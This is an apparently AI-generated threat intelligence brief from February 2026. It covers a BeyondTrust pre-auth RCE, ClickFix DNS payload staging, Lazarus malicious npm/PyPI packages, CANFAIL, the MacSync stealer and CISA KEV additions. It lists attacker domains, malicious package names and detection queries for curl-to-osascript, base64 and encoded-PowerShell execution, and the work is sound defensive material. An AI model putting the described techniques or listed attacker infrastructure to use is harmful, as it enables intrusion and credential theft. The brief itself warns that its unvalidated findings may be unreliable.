← Back to Threat Briefs

Threat Brief - 2026-02-15

⚠️ This report is AI-generated. Always validate findings.

Threat Brief — Saturday, February 15, 2026

Executive Summary

BeyondTrust CVE-2026-1731 hit CISA KEV and is actively exploited within 24 hours of PoC release—hunt for WebSocket/portal enumeration now. Microsoft disclosed a new ClickFix variant using nslookup for DNS-based payload staging that delivers ModeloRAT. Lazarus continues poisoning npm/PyPI with fake blockchain job offers.

1. BeyondTrust RS/PRA Pre-Auth RCE

🔴 Critical · Remote Code Execution · CVE-2026-1731 (CVSS 9.9) · PoC Available

Pre-authentication OS command injection in BeyondTrust Remote Support and Privileged Remote Access. Attackers abuse get_portal_info to extract x-ns-company value before establishing a WebSocket channel for RCE. WatchTowr and GreyNoise confirm in-the-wild exploitation less than 24 hours after PoC.

Sources: The Hacker News · GreyNoise

TTPs

TechniqueTacticObservable
T1190Initial AccessHTTP requests to /api/client/portal_info or similar BeyondTrust endpoints
T1059ExecutionOS command injection via crafted HTTP requests
T1071.001C2WebSocket connections post-exploitation

IOCs

  • 86% of recon from single IP using commercial VPN (Frankfurt provider)
  • Scanning operations rapidly added CVE-2026-1731 checks to existing toolkit

Detection

Log Sources: Web server access logs, WAF, BeyondTrust application logs, network traffic

Logic:

# Hunt for portal enumeration
index=web sourcetype=access_* (uri_path="*portal_info*" OR uri_path="*get_portal*")
| stats count by src_ip, uri_path, status
| where count > 10

# WebSocket establishment post-portal query
index=network dest_port=443 (http.request.uri="*websocket*" OR tcp.flags.syn=1)
| transaction src_ip maxspan=60s
| search eventcount > 5

Existing Coverage:

  • None specific (gap) — generic web exploitation rules may trigger

Action

🔴 Patch immediately. If running BeyondTrust RS 21.3-25.3.1 or PRA 22.1-24.x, apply BT26-02 patches now. Hunt for portal enumeration attempts.

2. DNS-Based ClickFix Attack (ModeloRAT/Lumma Stealer)

🔴 Critical · Social Engineering + Malware Delivery · No CVE · Active Campaigns

Microsoft disclosed new ClickFix variant using nslookup against external DNS servers to retrieve payloads from TXT records. Bypasses web request monitoring by blending into DNS traffic. Delivers ModeloRAT (Python RAT) and Lumma Stealer via CastleLoader.

Sources: The Hacker News · Microsoft

TTPs

TechniqueTacticObservable
T1204.002ExecutionUser runs command via Windows Run dialog
T1059.001Executioncmd.exenslookup with hardcoded external DNS server
T1071.004C2DNS queries to attacker-controlled nameservers
T1059.006ExecutionPython-based ModeloRAT execution
T1547.001PersistenceLNK file in Windows Startup folder

IOCs

  • azwsappdev[.]com — Payload hosting (ZIP archive)
  • Hardcoded external DNS servers (not system resolver)
  • VBScript launching ModeloRAT

Detection

Log Sources: Sysmon (ProcessCreate, NetworkConnect), DNS logs, PowerShell logs

Logic:

# Nslookup to non-standard DNS server
index=sysmon EventCode=1 Image="*nslookup.exe"
| regex CommandLine="nslookup.*\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
| where NOT match(CommandLine, "(8\.8\.8\.8|8\.8\.4\.4|1\.1\.1\.1)")

# CMD spawning nslookup then PowerShell
index=sysmon EventCode=1 
| transaction ParentProcessId maxspan=30s
| search Image="*cmd.exe*" Image="*nslookup.exe*" Image="*powershell.exe*"

Existing Coverage:

Action

🔴 Hunt for nslookup with external DNS. Microsoft detects as Trojan:Win32/ClickFix.R!ml. Look for LNK files in Startup folders pointing to VBScript.

3. Lazarus npm/PyPI Supply Chain Campaign

🔴 Critical · Supply Chain Compromise · No CVE · Active Since May 2025

North Korea-linked Lazarus Group poisoning npm/PyPI with 25+ malicious packages using fake blockchain recruitment (Veltrix Capital). Social engineering via LinkedIn/Facebook/Reddit job offers. Packages deploy token-authenticated RAT with file exfil capabilities.

Sources: The Hacker News · ReversingLabs

TTPs

TechniqueTacticObservable
T1195.002Initial AccessMalicious npm/PyPI packages as dependencies
T1566.003Initial AccessSpearphishing via social platforms (LinkedIn, Reddit)
T1059.007ExecutionJavaScript malware disguised as *.pdf.js
T1041ExfiltrationHTTP POST with token-based auth to C2

IOCs

Malicious npm packages: graphalgo, graphorithm, graphstruct, bigmathutils (10k+ downloads), terminal-kleur, graphflux, graphhub, graphrix

Malicious PyPI packages: graphalgo, graphex, graphlibx, bigpyx, bignum, bigmathutils

Indicators:

  • Fake company: Veltrix Capital
  • GitHub orgs with “blockchain” coding assessments
  • Token-based C2 authentication (Jade Sleet TTP)
  • MetaMask extension detection

Detection

Log Sources: Package manager logs, EDR, network traffic

Logic:

# npm/pip install of known malicious packages
index=endpoint (process="*npm*" OR process="*pip*") 
| regex CommandLine="(graphalgo|bigmathutils|graphflux|terminal-kleur|graphrix)"

# JavaScript with double extension
index=sysmon EventCode=11 TargetFilename="*.pdf.js"

# MetaMask enumeration
index=sysmon EventCode=1 CommandLine="*metamask*" CommandLine="*extension*"

Existing Coverage:

Action

🔴 Audit dependencies. Run npm audit / pip-audit. Block or alert on packages listed above. Educate developers on fake recruiter campaigns.

4. CANFAIL Malware Targeting Ukraine

🟡 High · Espionage · No CVE · Russian-Linked APT

Google GTIG attributes CANFAIL malware to suspected Russian intelligence. Targeting Ukrainian defense, energy, government. Actor uses LLMs for reconnaissance and lure generation. Phishing impersonates Ukrainian energy orgs.

Sources: The Hacker News · Google Cloud Blog

TTPs

TechniqueTacticObservable
T1566.002Initial AccessGoogle Drive links in phishing emails
T1059.007ExecutionObfuscated JavaScript (.pdf.js)
T1059.001ExecutionPowerShell dropper → memory-only execution
T1204.001ExecutionUser executes RAR archive content
T1102C2WebSocket-based trojan communication

IOCs

  • RAR archives via Google Drive links
  • JavaScript files with double extension (*.pdf.js)
  • Fake Ukrainian energy company domains
  • LLM-generated phishing lures

Detection

Log Sources: Email gateway, Sysmon, PowerShell logs

Logic:

# RAR extraction followed by JS execution
index=sysmon EventCode=1 
| transaction ParentProcessId maxspan=60s
| search (Image="*WinRAR*" OR Image="*7z*") Image="*wscript*" 

# Memory-only PowerShell (no -File parameter)
index=sysmon EventCode=1 Image="*powershell.exe" 
| where NOT match(CommandLine, "-File")
| where match(CommandLine, "-e|EncodedCommand|FromBase64")

Existing Coverage:

Action

🟡 Hunt if in-scope. Relevant for orgs supporting Ukraine or in defense/energy sectors. Look for Google Drive links in phishing leading to RAR→JS→PowerShell chains.

5. macOS MacSync Stealer via Claude/Google Ads

🟡 High · Info Stealer · No CVE · ClickFix Social Engineering

Campaign abuses Google Ads and Anthropic Claude artifacts to deliver MacSync stealer. 15,000+ users exposed. Uses ClickFix technique to trick users into running Terminal commands. Targets keychain, browser data, crypto wallets.

Sources: CyberPress · Moonlock Lab

TTPs

TechniqueTacticObservable
T1583.008Resource DevMalvertising via Google Ads
T1204.002ExecutionUser pastes Base64 command into Terminal
T1059.002Executionosascript piped command execution
T1555Cred AccessKeychain credential theft
T1041ExfiltrationHTTP POST with chunked uploads

IOCs

  • a2abotnet[.]com/dynamic — C2 server
  • a2abotnet[.]com/gate — Data exfil endpoint
  • raxelpak[.]com — Payload hosting
  • apple-mac-disk-space.medium[.]com — Fake Apple article
  • /tmp/osalogging.zip — Staging file

Detection

Log Sources: macOS Unified Logs, EDR, network traffic

Logic:

# Curl piped to osascript
process where process.name == "osascript" and process.parent.name == "curl"

# Base64 decode in Terminal context
process where process.name == "base64" and process.args : "-d" 
  and process.parent.name in ("Terminal", "bash", "zsh")

# Network to known C2
dns.query.name : ("a2abotnet.com", "raxelpak.com")

Existing Coverage:

Action

🟡 Block IOCs at perimeter. Add a2abotnet[.]com and raxelpak[.]com to blocklists. Educate users about fake “DNS resolver” or “disk analyzer” prompts.

6. CISA KEV Additions (Feb 12-14)

🟡 High · Multiple Products · Active Exploitation

CISA added 4 vulnerabilities to KEV catalog. Notable: Notepad++ supply chain attributed to China-linked Lotus Blossom (Chrysalis backdoor).

CVEProductCVSSNotes
CVE-2026-20700Apple iOS/macOS7.8Memory corruption, targeted spyware delivery
CVE-2025-15556Notepad++7.7Update hijack → Chrysalis backdoor (Lotus Blossom)
CVE-2025-40536SolarWinds WHD8.1Auth bypass, used in lateral movement campaigns
CVE-2024-43468Microsoft SCCM9.8SQL injection (patched Oct 2024, now actively exploited)

Sources: CISA KEV · SC Media

Detection

Log Sources: Endpoint telemetry, software inventory, web logs

Existing Coverage:

Action

🟡 Verify patch status. Federal agencies must remediate by March 5, 2026. Hunt for SolarWinds WHD exploitation if internet-exposed. Check Notepad++ update integrity.

Priority Actions

  1. 🔴 BeyondTrust CVE-2026-1731 — Patch RS/PRA immediately; hunt for get_portal_info probes
  2. 🔴 ClickFix DNS staging — Hunt for nslookup to external DNS servers followed by PowerShell
  3. 🔴 Lazarus npm/PyPI — Audit for malicious packages: graphalgo, bigmathutils, graphflux family
  4. 🟡 macOS MacSync — Block a2abotnet[.]com and raxelpak[.]com; educate users on Terminal paste attacks
  5. 🟡 CISA KEV — Verify SCCM, SolarWinds WHD, Notepad++ patch status; hunt for Chrysalis indicators